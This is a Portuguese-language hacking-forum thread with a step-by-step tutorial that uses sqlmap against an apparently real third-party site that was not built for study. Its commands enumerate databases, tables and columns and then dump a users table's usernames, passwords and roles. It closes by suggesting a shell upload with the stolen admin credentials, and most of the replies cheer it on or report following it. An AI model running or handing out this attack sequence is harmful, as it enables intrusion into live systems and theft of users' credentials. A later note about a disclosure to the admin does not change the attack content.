Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sql Injection com o SQLMAP

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Sql Injection com o SQLMAP

    Isso é um simples tutorial onde se explora a vulnerabilidade sql injection com o sqlmap.

    Os comandos ou parâmetros listados nesse tutorial são encontrados no:

    Código:
    ./sqlmap.py –h
    Onde serão listados diferentes parâmetros interessantíssimos!

    Um pouco sobre a ferramenta Sqlmap.


    Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.


    Bom vamos aos estudos.


    Irei usar o sqlmap em um site que não foi criado para fins estudantis.


    Lembrando que este site ao qual obtive tais informações foi comunicado ao admistrador e ao webmaster sobre vulnerabilidade para poder ser corrigida.

    Código:
    ./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -b
    Onde:

    --url = URL do site
    -b = Pega o banner do DBMS (“Database Management System”, sistema gerenciador de banco de dados.)



    Código:
    
    ./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6"  --current-db
    Onde:

    --current-db = Mostra o banco de dados que esta sendo usado



    Mas para verificar todos os bancos de dados existentes:

    Código:
    ./sqlmap.py --url " http://sitealvo.com.br/produto.php?time=6"  --dbs
    Onde:

    --dbs = lista todos os bancos de dados de DBMS.



    Depois de obter os bancos de dados agora já podemos listar as tabelas.

    Código:
    
    ./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6"  -D imopmarn_casa --tables
    Onde:

    -D
    = Banco de dados alvo. (neste caso o banco de dados alvo é imopmarn_casas)
    --tables = listar tabelas.



    Obs: Houve um erro nessa preview o correto das tabelas são:

    badad.........=....fotos
    badadbe.....=....peruibe
    badadees....=....clientes
    badades......=....cidades
    badadis.......=....imoveis
    bairros........=....bairros
    basarios......=....usuarios
    bastros.......=....rastros

    É importante sempre indicar o banco de dados alvo (-D) antes de listar as tabelas pois caso não faça isso (sem o –D) ele irá listar todas as tabelas de todos os bancos de dados.

    Após ter conseguido achar as tabelas vamos então listar as colunas.

    Código:
    ./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6"  -D imopmarn_casa –T usuários --columns
    -T = Tabela alvo
    --columns = Listar colunas.





    Agora já com as tabelas e colunas listadas pode-se obter informações importantes do site alvo a partir das colunas que nos foi dada com:

    Código:
    
    ./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6"  -D imopmarn_casa –T usuarios –C ‘usuario,senha,funcao’ --dump
    Onde:

    -T = tabela alvo
    -C = Colunas alvo, ou seja pode ser mais de uma coluna a ser escolhida. Ex: ‘usuario,senha’ (sempre separados por virgula e abrindo e fechando com aspas simples ‘’).
    --dump = obter, extrair dados (dumpeado dados).



    Bom depois de extraídos os dados de usuário(adm) e senha do site alvo pode-se fazer o upload de uma shell.

    Agradecimentos:
    samukt e papaismurf
    Seus tutorias estão otimos sobre o sqlmap.
    Foi de onde veio a inspiração de fazer um para o Guia do Hacker.


    Faça bom uso desse conteúdo.
    Sua cabeça é seu guia.

    O Guia do Hacker não é responsavel pelos seus atos!
    sigpic




  • Font Size
    #2
    Muito bom e bem organizado!

    Depois vou seguir esses passos e falo como foi
    Valeu!

    Comment


    • Font Size
      #3
      caramba muito bem explicado fiz td certo e deu otimo

      Comment


      • Font Size
        #4
        Niceeee.

        Na minha humilde opniao e a melhor ferramenta para sql injection.

        Thanks pelo tuto.

        Fico muito bom mesmo.
        WhiteCollarGroup till I die
        MI5, MI6,NSA,FBI,Army, CIA,Navy,Air Force, Mossad, PF and all this shit can't stop me.

        Comment


        • Font Size
          #5
          Ótimo post, segui passa-a-passo sua explicação e não tive problemas. Vlw por compartilhar!

          Comment


          • Font Size
            #6
            Bom tópico, obrigado por compartilhar seu conhecimento

            Comment


            • Font Size
              #7
              O tutorial está show, muito bem ilustrado com screenshot e comentado.

              O samukt é brotherzão cara, ele é fera também!
              Obrigado pelo tópico.

              Shalom!
              sigpic
              Eis que estou à porta, e bato; se alguém ouvir a minha voz, e abrir a porta,
              entrarei em sua casa, e com ele cearei, e ele comigo. (Apocalipse 3:20)

              https://twitter.com/jackads
              http://www.facebook.com/jackson.beneteferreira

              Comment


              • Font Size
                #8
                Ótimo tutorial, obrigado por postar!
                Em busca do conhecimento!

                Comment


                • Font Size
                  #9
                  Boa noite a todos, sou novo no assunto
                  e gostaria de saber como faço para abrir essa tela inicial,
                  e gostaria de começar estudos sobre invasão e gostaria de saber de voc~es por onde devo
                  começar
                  desde já agradeço a ajuda de todos.

                  Comment


                  • Font Size
                    #10
                    muito bom manolo

                    Comment


                    • Font Size
                      #11
                      Muiito bom...
                      Poderia me passar o lindo do SQLMAP para download?

                      Comment


                      • Font Size
                        #12
                        Obrigado por compartilhar, muito bacana o tutorial.

                        Abraços.

                        WCG147
                        sigpic

                        Comment


                        • Font Size
                          #13
                          alguem poderia me dizer o que acontece de errado aqui????

                          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                          Uploaded with Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

                          Comment


                          • Font Size
                            #14
                            @bombshell
                            É como se o site não estivesse respondedo aos pedidos... o site está "instável".
                            Tente outro

                            @prT's
                            Bom tutorial. Utilizo as vezes o sqlmap e recomendo!

                            Comment


                            • Font Size
                              #15
                              Very Nice !!! .. Estou começando agora meus estudos em sql injection e creio q esse tuto. vai me ajudar muito.

                              Obrigado por partilhar isso conosco ... ^^
                              ... Sempre fui meu próprio mestre. E também era meu aluno favorito ...


                              sigpic

                              Comment

                              X
                              Working...
                              X